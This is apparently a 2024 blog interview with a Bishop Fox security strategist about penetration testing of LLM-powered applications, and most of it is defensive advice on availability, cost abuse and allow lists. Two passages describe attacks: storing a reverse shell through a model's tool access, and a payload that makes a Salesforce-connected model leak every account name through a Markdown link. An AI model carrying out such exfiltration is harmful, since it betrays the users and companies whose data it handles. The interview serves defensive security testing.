Tales from the Forefront: Demystifying AI and LLM Pen Testing with Rob Ragan of Bishop Fox
Kathryn Shih
July 30, 2024
- Blog Post
Rob Ragan is a Principal Technology Strategist at Bishop Fox, a leading authority in offensive security and provider of enterprise penetration testing (pen testing), red teaming, and attack surface management.
Rob is a principal architect and researcher who specializes in security automation. He is an expert on innovative methodologies including LLM Integration Testing and drives cross-functional efforts to align technology strategy and business objectives across Bishop Fox’s Product, Sales, Marketing, and R&D teams.
Today we’re excited to speak with Rob about his insights from pen testing AI and LLM integrations for Bishop Fox’s extensive base of customers.
Kathryn Shih [KS]
Rob, tell us about the history of AI pen testing at Bishop Fox and how you’ve seen LLM pen testing emerge and evolve. Where did it all begin and what types of customer use cases are you working with today?
Rob Ragan [RR]
Some of the earliest machine learning products we tested at Bishop Fox were systems designed to capture images for autonomous car training and systems which processed data for use in model training. We often looked at how intellectual property was being protected (or not) as data was collected and stored not just in the applications, but throughout the broader infrastructure.
Over the last 18 months, more and more of our customers have started to reach out about GenAI and LLMs. That brings us to today, where we’re seeing AI and LLM use cases across every industry and vertical. There are many internal business use cases for employees, some of which are more experimental and others which utilize off-the-shelf AI and LLM products. Often, these are summarization use cases that involve knowledge base search and retrieval or similarity search for text documents, where the goal is to help employees perform tasks using natural language. In other instances, companies are leveraging AI for assistant use cases. For example, some of our customers are using LLMs to integrate complicated security and IT product settings with natural language so employees can describe the functionality they want and receive an example configuration.
There are also some interesting automation use cases. Some companies are pairing discriminative machine learning models (which predict future outcomes based on how decisions have been made in the past) with LLMs to help employees interpret model outputs and interact with models. By discriminative ML models I mean advanced automated decision-making for things like deciding if an incoming email is spam, if a package will arrive on time, or if an autonomous car is approaching a red light.
At this point, far fewer companies have AI or LLM implementations that are externally available in their products and to their customers. If they do, it’s often something like a customer support chat bot and is typically a very early version. For example, some of the companies we work with in the education space are using chatbots to help teachers tutor students or leveraging GenAI to assist educators as they generate content and update syllabi.
We also work with a lot of vendors building products using AI or LLMs. Some are developing platforms that allow you to build your own chat bot for unique business use cases. Others are building ChatOps platforms which can be queried with natural language and use plugins and access to retrieve data and accomplish tasks. These vendor AI implementations tend to be the farthest along across our customer base.
Testing is paramount to the success of these products and features; we aren’t seeing much resilience in the first versions we’re testing as these use cases are often rushed to release. However, vendors building products with AI and LLMs have put the most effort into a security architecture, thinking through abuse cases, and building multiple layers of defense. They often have security controls which try to sanitize or validate user input and review and process output. More often these product companies have seen what can go wrong with AI and get a lot of feedback from their customers.
KS
Let’s zoom out for a moment before we dive into the details. A lot of people conflate pen testing for LLMs and pen testing for LLM-powered applications. How do you distinguish the two? Do security problems or mitigations tend to come from the LLM or the application around it?
RR
At Bishop Fox, we differentiate by whether we are testing the integration and overall application or the model interactions and layers which validate input or sanitize output. Most commonly, we’re asked to test the entire application environment- pen testing for AI or LLM-powered applications. That’s where we see a lot of common application vulnerabilities and fundamental issues in these early versions.
Many companies face pressure to hit deadlines, rush their use cases, and subsequently make fundamental application security mistakes. For example, we’ve seen simple issues like being able to modify the session identifier to see someone else’s chatbot log. Those types of application integration issues need to be tested for and reviewed.
“Many companies face pressure to hit deadlines, rush their use cases, and subsequently make fundamental application security mistakes. For example, we’ve seen simple issues like being able to modify the session identifier to see someone else's chatbot log. Those types of application integration issues need to be tested for and reviewed.”
However, some companies just want to focus on interactions with the AI or LLM model itself and test for jailbreaking (methods of bypassing model safety restrictions) or prompt injection issues. We prefer to take an approach that comprehensively looks at all the components involved in model integrations. Most companies take an open-source or foundational model from a major provider, leverage hosting services like Azure AI Studio, and then build their application around that; they may also perform RAG (retrieval augmented generation) to customize the data the application can access. It’s always more impactful from a testing perspective to look at how the model is integrated and review the design, threats, and security controls between the components and layers.
KS
Interesting, so the whole application environment needs to be tested in most cases. I’m sure you have seen plenty of vulnerabilities as more customers integrate AI and LLM models. What are some of the most notable security issues Bishop Fox has worked on?
RR
Remote code execution comes to mind. Some AI products give access to other tools through a prompt; if the system can perform network requests or download and store data in file systems, an attacker may be able to store a reverse shell script and later retrieve it through other means. Attackers may also be able to abuse system access to API keys, which are stored in the system prompt or other components.
Another issue we’ve seen is that a model output interface can be exploited if it renders JavaScript, HTML, or Markdown. In one case, a client was using a plugin with access to Salesforce so their employees could prompt the model about customer accounts and sales opportunities. To simulate an attack, we crafted a payload that retrieved every Salesforce account name, encoded it to be stored in a URL query string parameter, and turned it into a Markdown link leading to a server we controlled. When a user interacted with the link, it sent all the Salesforce account names to our server.
KS
There are definitely some pre-GenAI analogies there, like how you need to escape JavaScript and CSS characters when putting user-generated data on a webpage.
Besides security vulnerabilities like the ones you mentioned, are companies overlooking anything else when it comes to their AI and LLM integrations?
RR
Availability is one of the biggest things companies miss. For example, over the last 90 days OpenAI has less than two nines of uptime (<99%), translating to hours of downtime each month. If you’re relying on OpenAI or another provider for day-to-day usage in production or across your employee base, that’s a big problem. Companies need a redundancy plan and a backup switch to activate another provider if their primary provider goes down, but most haven’t built this capability into their systems yet.
Latency is another major factor companies overlook. They need controls to both detect if the LLM is taking too long to respond and what component is causing the delay. Latency may come from the model provider, a security layer, or a monitoring layer.
Most companies aren’t considering anti-automation controls, either. If an attacker deploys a bot against a company’s endpoint and spikes the costs of usage, they might not detect it until they receive a giant bill. Denial of wallet is a real threat here, especially if the company has usage caps that limit their spending. A bot or attack can cause them to hit their cap, preventing their users from accessing the system. It’s one of the most unexpected and common issues we’ve seen and is among the top 15 findings we report to our customers.
In addition, companies using RAG need to evaluate how accurate it is instead of assuming it simply eliminates all hallucinations. This involves building test cases into the system to evaluate accuracy and determine if outcomes deviate from the expected behavior, especially as the system changes over time.
There’s the consideration of accuracy here as well: does your use case need the model to be 100% accurate or 96.8% accurate, and how do you ensure that level of accuracy?
“In addition, companies using RAG need to evaluate how accurate it is instead of assuming it simply eliminates all hallucinations. This involves building test cases into the system to evaluate accuracy and determine if outcomes deviate from the expected behavior, especially as the system changes over time.”
Companies should also consider cases where they might want to route users to something else outside of the AI model. If you detect that a user prompts about something sensitive, maybe you can avoid ambiguity by routing them to the source of truth, referencing the raw language from a policy, or introducing a human in the loop for especially sensitive topics like pricing, refunds, or discounts.
KS
So that’s where companies aren’t paying enough attention. Are there any areas where companies spend too much time when integrating AI?
RR
I’ve seen companies pouring a lot of energy and resources into creating a deny list to limit LLM functionality and detect jailbreaks or prompt injections. This isn’t very effective because it’s essentially impossible to create a list that denies every bad interaction for things like toxicity. We’ve been advising companies to instead create an allow list of the functionality they expect based on their customer support FAQ’s or how they want a customer support agent to act. That creates a much smaller set of talk tracks and language than a list of everything that could go wrong. This is a fundamental security principle (using allow lists instead of deny lists), however we’re seeing this mistake from data science teams that think they can ML their way out of the problem.
The other thing that companies often miss is the bigger MLOps picture. Too many companies focus on testing specific LLM API endpoints while their data is leaking in more traditional ways.
With AI and LLM integrations, there’s often a lot of data moving quickly through manual measures. At the same time, as data science teams become more involved in building AI systems they’re going to face increasingly aggressive timelines. We expect to see more and more traditional breaches as a result- things like an employee accidentally exposing a bucket in a cloud environment or copying data somewhere they shouldn’t. Companies need a renewed focus on tabletop exercises, incident response plans, and red team/blue team live fire exercises to protect their data science teams’ interactions with their crown jewel data.
“The other thing that companies often miss is the bigger MLOps picture. Too many companies focus on testing specific LLM API endpoints while their data is leaking in more traditional ways.”
KS
That’s interesting- I’ve already been hearing from many people who are under tremendous pressure to launch GenAI features this year. At the implementation level, what security-related steps should teams prioritize if they face tight timelines?
RR
Some of the most important factors are performing early design reviews, establishing a taxonomy of threats and issues to test for, and defining ownership and responsibilities across and among the security and data science teams. It’s critical to build repeatable test cases as well. Testing your implementations early and often helps you steer away from decisions that won’t work in the final release.
KS
Let’s shift to the individual level for the last couple of questions. A lot of developers now find themselves working on AI and LLM-powered applications for the first time. As someone with experience pen testing applications with and without AI, where do you think intuition from software development carries over to AI use cases? What aspects of AI and LLMs might be new, even to experienced developers?
RR
Security fundamentals are important for any company integrating AI, including the principles of secure design, least privilege, and segmentation of duties. Companies also need to revisit each component in their architecture and define the data flow. What inputs and outputs does each component expect? What are all the business use cases and abuse cases? How can you build and rerun test cases as you evolve your implementation to ensure nothing breaks? All of this should be familiar to people with development experience.
On the other hand, AI integrations have unique nuances. In traditional software engineering, you test and security review different versions of code to ensure proper functionality and fix issues. With something like an AI data model, there are likely different versions of the model itself. You not only have to worry about the integration of the model and the code, but also what a new version of the model might break or how it could introduce security issues. Model version testing must be built into the development pipeline.
In addition, business logic that was previously implemented with code in software often becomes conversational logic in an LLM. Preparing to accept any input and handle it safely becomes very important and requires a shift in approach. Teams need to focus on how to safely convert and handle inputs and where to add exceptions to avoid handling certain cases. For example, language models may not be designed to output “I don’t know,” requiring developers to build cases that generate errors in the system, respond with “I’m not sure how to answer that, let me link you to our official policy,” or output “Say ‘human’ to speak to a customer support representative.”
KS
Rob, this has been a great conversation with so many valuable insights. Do you have any resource recommendations for people who want to learn more about AI and LLM applications and integrations?
RR
I highly recommend reading Designing Machine Learning Systems. That book helped me learn to holistically think about getting a machine learning implementation from research to production.
At Bishop Fox, we have done several projects experimenting with what causes data leaks and how companies can prevent them with data preparation and output sanitization. We are also maintaining a list of every open-source LLM testing tool we can find. As a note, most require a tailored test harness- testing with zero-shot prompting won’t be very effective.
I also recently hosted a webinar on testing LLM algorithms and participated in a fireside chat on AI and LLM security alongside industry leaders from Moveworks.
***
Follow Rob on LinkedIn and X to stay up to date with his latest insights on AI and LLM security testing.
Forgepoint Capital also recommends the following resources:
- European Union Agency for Cybersecurity Multilayer Framework for Good Cybersecurity Practices for AI